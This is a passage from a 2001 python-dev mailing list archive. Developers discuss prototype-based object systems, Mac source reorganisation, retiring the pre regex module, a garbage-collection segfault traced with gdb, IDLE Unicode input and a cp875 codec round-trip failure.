to be a clean start, I'ld urge basing it on prototypes, but as
an incremental creation -- I don't know how to get there from 
here (unless it could sneak in under the implementation covers!)


 BTW: XlispStat, which has a prototype object system with multiple
inheritence also doesn't have "super" -- there is a 
(call-next-method [ args... ]) function/macro which searches for
 the base classes. I'm sure there's a lower level function to 
 just get the next method, but typically, call-next-method is
 what's used. There is no search for non-method attributes, as
 all of the base class instance vars are merged and made into
 slots of the instance itself. ( There's no class variables -- 
 there's no classes.) 

 The closest python equivalent would be, as has been discussed
in this thread, a  super method or function that does attribute
 lookup on the bases. 


-- Steve Majewski


From nas@python.ca  Fri May 11 15:06:39 2001
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply@sourceforge.net wrote:
> Module objects currently don't define the tp_getattro 
> or tp_setattro slots.  As a result, interning of 
> attribute names does them no good:  a char* is always 
> passed, so the dict lookup always needs to do a string 
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as
well.  PyObject_GetAttrString is always used.  I believe the old
code interned names like "__add__" and used PyObject_GetAttr.  Is
it worth fixing this?

  Neil


From guido@digicool.com  Fri May 11 16:13:56 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
 <20010511070639.A1402@glacier.fnational.com>
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
 <20010511070639.A1402@glacier.fnational.com>
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well.  PyObject_GetAttrString is always used.  I believe the old
> code interned names like "__add__" and used PyObject_GetAttr.  Is
> it worth fixing this?

Maybe.  I'd give this low priority.  If my descriptor branch work goes
well, most of classobject.c *may* disappear in favor of the newly
swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jack@oratrix.nl  Fri May 11 15:29:24 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks,
the Python/Mac repository has been moved to sourceforge, and is integrated 
with the general Python repository, so from now on a single CVS tree suficces 
to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more 
weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of 
the optional libraries you need to build MacPython, but that's only if you 
want to build it completely from CVS.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From martin@loewis.home.cs.tu-berlin.de  Fri May 11 15:41:33 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is
a good thing.

It seems, however, that some of the directory structure is backwards:
Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
may be others of this kind.

I also wonder whether all these files are still needed, and meant to
be distributed. E.g. I see chdir.c having the comment

/* Chdir for the Macintosh.
   Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
   Pathnames must be Macintosh paths, with colons as separators. */

Is it really the case that the Mac API hasn't grown a chdir call in 13
years?

Regards,
Martin


From fdrake@acm.org  Fri May 11 15:55:33 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 10:55:33 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>

Martin v. Loewis writes:
 > It seems, however, that some of the directory structure is backwards:
 > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
 > may be others of this kind.

  I agree that this should be the goal; I don't know if Jack's release
procedure would need to be revised before that can happen.  If so, I'd
encourage him to do so.

 > Is it really the case that the Mac API hasn't grown a chdir call in 13
 > years?

  Yikes!  I just search developer.apple.com for "chdir" and came up
with no hits, but I really don't know just what that tells me.
chdir() is required for POSIX compliance, but it isn't mentioned in
the C9X final committee draft.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From jack@oratrix.nl  Fri May 11 15:56:39 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:56:39 +0200
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: Message by "Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>
 ,
 Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl>

> It seems, however, that some of the directory structure is backwards:
> Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
> may be others of this kind.

Yes, now that the Mac stuff is integrated with the mainstream again this might 
be a good idea.

> I also wonder whether all these files are still needed, and meant to
> be distributed. E.g. I see chdir.c having the comment
> 
> /* Chdir for the Macintosh.
>    Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
>    Pathnames must be Macintosh paths, with colons as separators. */
> 
> Is it really the case that the Mac API hasn't grown a chdir call in 13
> years?

Hmm, hmm, I'm unsure.

MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current 
directories (by design. Whether I agree with the design is a different 
matter:-).

Normally MacPython is built with a special unix-compatibility library, GUSI, 
which does provide these calls. However, it is still possible to build without 
GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in 
it's MacOS API model") I've used these compatibility routines again, until I 
finally got GUSI ported.

But its easy enough to cvs-remove them from the normal tree, to be revived 
when needed. What do people think?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From Samuele Pedroni <pedroni@inf.ethz.ch>  Fri May 11 15:56:48 2001
From: Samuele Pedroni <pedroni@inf.ethz.ch> (Samuele Pedroni)
Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST)
Subject: [Python-Dev] Type/class
Message-ID: <200105111456.QAA00228@core.inf.ethz.ch>

Hi.

> 
>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
I agree, I often read that Smalltalk is "simple" up to metaclasses,
on the other hand the casual user can just ignore them.

>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)
> 
[Ignoring the fact that code and changes require coders]

Thinking in terms of proto-objects, parent slots and list parent slots:

python instance I have data slots and a parent slot __class__,

python classe G have data slots and a list parent slot __bases__,

then we have the python rules (not very uniforms):
function from I directly => function
function from I.__class__ => bound method
function from C => unbound method

That's the difficult part for every model that aims to remain compatible.

Samuele Pedroni.


From thomas.heller@ion-tof.com  Fri May 11 16:40:10 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Fri, 11 May 2001 17:40:10 +0200
Subject: [Python-Dev] Type/class
References: <Pine.NXT.4.21.0105110919490.501-100000@localhost>
Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>

>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)

I never looked at Self or other prototype based systems.
Is it really true that prototypes are a lot simpler than
metaclasses, but on the other hand more powerful?

The 'brain exploding properties' of metaclasses are IMO
only there because my brain cannot think easily in too
many recursion steps...

Thomas


From fdrake@acm.org  Fri May 11 17:25:54 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 12:25:54 -0400 (EDT)
Subject: [Python-Dev] status of pre?
Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>

  Have we formulated a plan of action regarding PCRE and the pre
module?  Are we planning to leave them in for another version, or is
SRE considered sufficiently stable?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From sdm7g@Virginia.EDU  Fri May 11 17:29:30 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 12:29:30 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105111130290.234-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Fred L. Drake, Jr. wrote:
> 
> Martin v. Loewis writes:
>  > Is it really the case that the Mac API hasn't grown a chdir call in 13
>  > years?
> 
>   Yikes!  I just search developer.apple.com for "chdir" and came up
> with no hits, but I really don't know just what that tells me.
> chdir() is required for POSIX compliance, but it isn't mentioned in
> the C9X final committee draft.


 There isn't a chdir in any of the pre-OSX Mac *system* libraries, and
Mac has never claimed any POSIX compliance (even with OSX, they have
officially said it's almost certainly POSIX compliant but they have
no plans for now to got thru the hoops and paperwork to get it 
certified.) 

 chdir is in unistd.h, which isn't part of the standard C library.

 However, Metrowerks *compiler* and IDE for the Mac does include in
MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW 
selling development tools obviously has more interest in being 
POSIX compliant than Apple! )


 I don't know if there's one in the MPW libraries, so maybe you
still want to leave it there. 

 -- Steve Majewski


From guido@digicool.com  Fri May 11 19:47:38 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 13:47:38 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400."
 <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>
Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com>

>   Have we formulated a plan of action regarding PCRE and the pre
> module?  Are we planning to leave them in for another version, or is
> SRE considered sufficiently stable?

Hm.  It should disappear but I believe I've heard people say they were
focred to use it because of the recursion limit problems with SRE on
some platforms.

We could put a warning on using pre or pcre in 2.2, and remove it in
2.3, hoping that /F fixes the recursion limit problems in the mean
time (weren't those related to the backtracking implementation)?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Fri May 11 21:41:30 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Fri, 11 May 2001 15:41:30 -0500
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <15100.20090.573866.569667@beluga.mojam.com>

Has anyone investigated interactions between ExtensionClass objects and GC?
I've encountered segfaults with 2.1 in certain situations when using the
latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
get using ExtensionClasses.  Any ideas how I should approach the problem?  I
don't know either piece of code at all and the code that generates the
segfault isn't particularly small, not to mention which it uses the bleeding
edge Gtk stuff (which I doubt anyone on this list will have installed) and a
version of ExtensionClass patched by James Henstridge, the PyGtk author.

Here's what I know:

    1. Disabling gc gets rid of the segfault
    2. I only see the problem with importing a specific module that
       subclasses the GtkTextView widget from the Python command line.  If I
       run it as a script from the shell prompt, I get no segfault.
    3. If I first import the gtk module, then import my module, I get no
       segfault. 
    4. Most changes I make to the module causing the problem cause the
       problemm to disappear.

All told, all this really tells me is I'm probably dealing with a
malloc/free problem of some sort.

Neil and/or Jim (and/or anyone else willing to look into this problem), I
can give you access to my development machine via ssh if you think that
would help debug the problem.

Skip

#0  0x0807163d in visit_decref (op=0x4034ece0, data=0x0)
    at ../Modules/gcmodule.c:153
#1  0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
#2  0x08071672 in subtract_refs (containers=0x80b8ac0)
    at ../Modules/gcmodule.c:167
#3  0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc)
    at ../Modules/gcmodule.c:379
#4  0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484
#5  0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507
#6  0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149
#7  0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244
#8  0x401f0979 in initializeBaseExtensionClass (self=0x4034d320)
    at ExtensionClass.c:1485
#9  0x401f6774 in export_subclassed_type (dict=0x82d33a4, 
    name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4)
    at ExtensionClass.c:3410
#10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, 
    class_name=0x40337c55 "GtkTreeViewColumn", 
    get_type=0x404c4080 <gtk_tree_view_column_get_type>, ec=0x4034d320, 
    bases=0x82ea9a4) at gobjectmodule.c:202
#11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071
#12 0x402f0ed0 in init_gtk () at gtkmodule.c:98
#13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", 
    pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52
#14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, 
    buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", 
    type=3) at ../Python/import.c:1296
#15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", 
    fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815
#16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, 
    p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc)
    at ../Python/import.c:1671
#17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, 
    locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522
#18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", 
    globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864)
    at ../Python/import.c:1563
#19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124)
    at ../Python/bltinmodule.c:31
#20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2838
#21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2801
#22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734
#23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c) at ../Python/ceval.c:346
#25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", 
    co=0x82910d0, 
    pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490
#26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754
#27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
    buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", 
    type=1) at ../Python/import.c:1287
#28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk")
    at ../Python/import.c:811
#29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, 
    buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5)
    at ../Python/import.c:1310
#30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", 
    fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815
#31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac)
    at ../Python/import.c:1671
#32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, 
    locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522
#33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", 
    globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c)
    at ../Python/bltinmodule.c:31
#35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2838
#36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2801
#37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734
#38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc) at ../Python/ceval.c:346
#40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", 
    co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490
#41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", 
    pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754
#42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, 
    buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287
#43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", 
    fullname=0xbfffeff0 "seg") at ../Python/import.c:1815
#44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec)
    at ../Python/import.c:1671
#45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, 
    locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522
#46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", 
    globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4)
    at ../Python/bltinmodule.c:31
#48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2838
#49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2801
#50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734
#51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4) at ../Python/ceval.c:346
#53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "<stdin>", 
    globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708)
    at ../Python/pythonrun.c:1045
#54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:570
#55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:510
#56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", closeit=0, flags=0xbffff708)
    at ../Python/pythonrun.c:473
#57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320
#58 0x400831f0 in __libc_start_main () from /lib/libc.so.6


From guido@digicool.com  Fri May 11 22:49:00 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 16:49:00 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST."
 <15100.20090.573866.569667@beluga.mojam.com>
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com>

> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
> intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
> get using ExtensionClasses.  Any ideas how I should approach the problem?  I
> don't know either piece of code at all and the code that generates the
> segfault isn't particularly small, not to mention which it uses the bleeding
> edge Gtk stuff (which I doubt anyone on this list will have installed) and a
> version of ExtensionClass patched by James Henstridge, the PyGtk author.
> 
> Here's what I know:
> 
>     1. Disabling gc gets rid of the segfault
>     2. I only see the problem with importing a specific module that
>        subclasses the GtkTextView widget from the Python command line.  If I
>        run it as a script from the shell prompt, I get no segfault.
>     3. If I first import the gtk module, then import my module, I get no
>        segfault. 
>     4. Most changes I make to the module causing the problem cause the
>        problemm to disappear.
> 
> All told, all this really tells me is I'm probably dealing with a
> malloc/free problem of some sort.
> 
> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

AFAIK, the latest version of Zope (which uses ExtensionClass
extensively if not exclusively :-) works fine with Python 2.1.

This suggests pointing a finger towards the PyGtk code... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From loewis@informatik.hu-berlin.de  Fri May 11 21:53:55 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Fri, 11 May 2001 22:53:55 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>

Thanks to a bug report I got, I noticed for the first time that you
cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
prompt, you may get

>>> s=3D'=E4=F6'
UnicodeError: ASCII encoding error: ordinal not in range(128)

Likewise, when trying to save a file that has non-ASCII characters,
you get a traceback.

Now, I think I understand all the causes of the problem (Tkinter
returning Unicode objects, and so on). However, I'm curious whether
anybody has proposals on how to deal with it.

For saving text files, if Python had an encoding directive, things
might be easier :-) For the shell prompt, I've no idea how to solve
this best.

So any suggestions are welcome.

Regards,
Martin


From fredrik@pythonware.com  Fri May 11 23:18:27 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 00:18:27 +0200
Subject: [Python-Dev] status of pre?
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>  <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid>

guido wrote:
> 
> We could put a warning on using pre or pcre in 2.2, and remove it in
> 2.3, hoping that /F fixes the recursion limit problems in the mean
> time (weren't those related to the backtracking implementation)?

2.2 is to be released in october, right?  I'm sure I could shake
out the remaining bugs in my "stackless SRE" patch until then...

Cheers /F


From fredrik@effbot.org  Sat May 12 00:03:10 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:03:10 +0200
Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid>

http://www.theregister.co.uk/content/4/18909.html

    "Microsoft Altair BASIC legend talks about Linux, CPRM and
    that very frightening photo

    ...

    His other passion, he tells us, is Python. 

    "Hats off to them. It's an extremely well designed language. It's
    object orientated from the get-go. They've really succeeded there,"
    he says, and commends it as the ideal teaching language. That
    used to be BASIC, of course"

    ...

(no, it's not Bill)

Cheers /F


From fredrik@effbot.org  Sat May 12 00:14:47 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:14:47 +0200
Subject: [Python-Dev] Hats off to them!
References: <014a01c0da6e$93578ca0$e46940d5@hagrid>
Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid>

>     "Hats off to them. It's an extremely well designed language. It's
>     object orientated from the get-go. They've really succeeded there,"
>     he says, and commends it as the ideal teaching language. That
>     used to be BASIC, of course"

reading on, I'm not sure why BASIC ever was the ideal teaching
language:

http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11

    "One of the nice things about this BASIC is it has this so called
    direct mode. So you can PRINT 2 + 2. It prints the square root
    of ten"

Cheers /F


From sdm7g@Virginia.EDU  Sat May 12 03:43:31 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 22:43:31 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>
Message-ID: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Thomas Heller wrote:

> I never looked at Self or other prototype based systems.
> Is it really true that prototypes are a lot simpler than
> metaclasses, but on the other hand more powerful?

Definitely simpler: No classes, No metaclasses, only objects.

Ignore for now the fact that a limited set of classes are 
handier for a statically type checked language and just 
consider dynamic languages, which is their proper domain.      

Prototype semantics  basicalaly subsume class semantics. 
Any object can be an exemplar and fill the role of a class,
and it can be used ONLY as a template and holder of shared
behaviour, so it can be used like a class. 

[One of the self papers -- one which I haven't read -- is
entitled "Self includes Smalltalk"  -- and is, I believe,
a demonstration that SmallTalk is sort of a subset of Self.]


But you can also have finer grain classification and you 
can have object inheritance. ( This is handly in XlispStat,
which is oriented towards statistics and analysis: you can
have derived objects, for example different subsamples of
the same population, or in my app, different energy spectra,
along with derived and processed spectra with special rules
for treatment: e.g. linear filtered spectra have a filter
function or kernel, and if they are fit against reference
spectra, they need to be fit against references that have 
had the same filter applied to them -- if none available
create one from unfiltered samples -- and maybe a whole
chain of derived data. In a class based system, you would
have to manually maintain a separate linked list of objects,
but in a prototype system they can all be cloned from their
parent objects. )   

The other plus for things like exploratory statistics is that
you don't have to design a class hierarchy ahead of time -- 
it more concrete and less abstract than a class based system.

Prototypes can also solve some of the sort of problems that
Jim Fultons acquisition framework in Zope is designed to 
handle. (But it's been a while since I read that paper and
I haven't used it, so I'm relying on my memory of thinking
"Yeah -- that would be simpler with prototypes" ) 

You definitely don't have to worry about simulating the 
Prototype Pattern. (I've seen GUI systems in C++ that go
thru a lot of code to add prototype-like behavior to C++ classes.) 


But -- unless I can figure a useful way to use it under the
covers, it's not really a topic for python-dev.  


> The 'brain exploding properties' of metaclasses are IMO
> only there because my brain cannot think easily in too
> many recursion steps...

It's just like spelling bananana -- the problem is to know
when to stop! ;-)


-- Steve Majewski


From tim_one@email.msn.com  Sat May 12 12:28:27 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 07:28:27 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>

I have a way to make dict lookup a teensy bit cheaper(*) that significantly
reduces the number of collisions (which is much more valuable).

This caused a number of std tests to fail, because they were implicitly
relying on the order in which a dict's entries are materialized via .keys()
or .items().

Most of these were easy enough to fix.  The last failure remaining is
test_unicode, and I don't know how to fix it.  It's dying here:

    try:
        verify(unicode(s,encoding).encode(encoding) == s)
    except TestFailed:
        print '*** codec "%s" failed round-trip' % encoding
    except ValueError,why:
        print '*** codec for "%s" failed: %s' % (encoding, why)

when encoding == "cp875".  There's a bogus problem you have to worm around
first:  test_unicode neglected to import TestFailed, so it actually dies
with NameError while trying the "except TestFailed" clause after verify()
raises TestFailed.  Once that's repaired, it's complaining about failing the
round-trip encoding.

The original character in s it's griping about is "?" (0x3f).  cp875.py has
this entry in its decoding_map dict:

	0x003f: 0x001a,	# SUBSTITUTE

But 0x1a is not a *unique* value in this dict.  There's also

	0x00dc: 0x001a,	# SUBSTITUTE
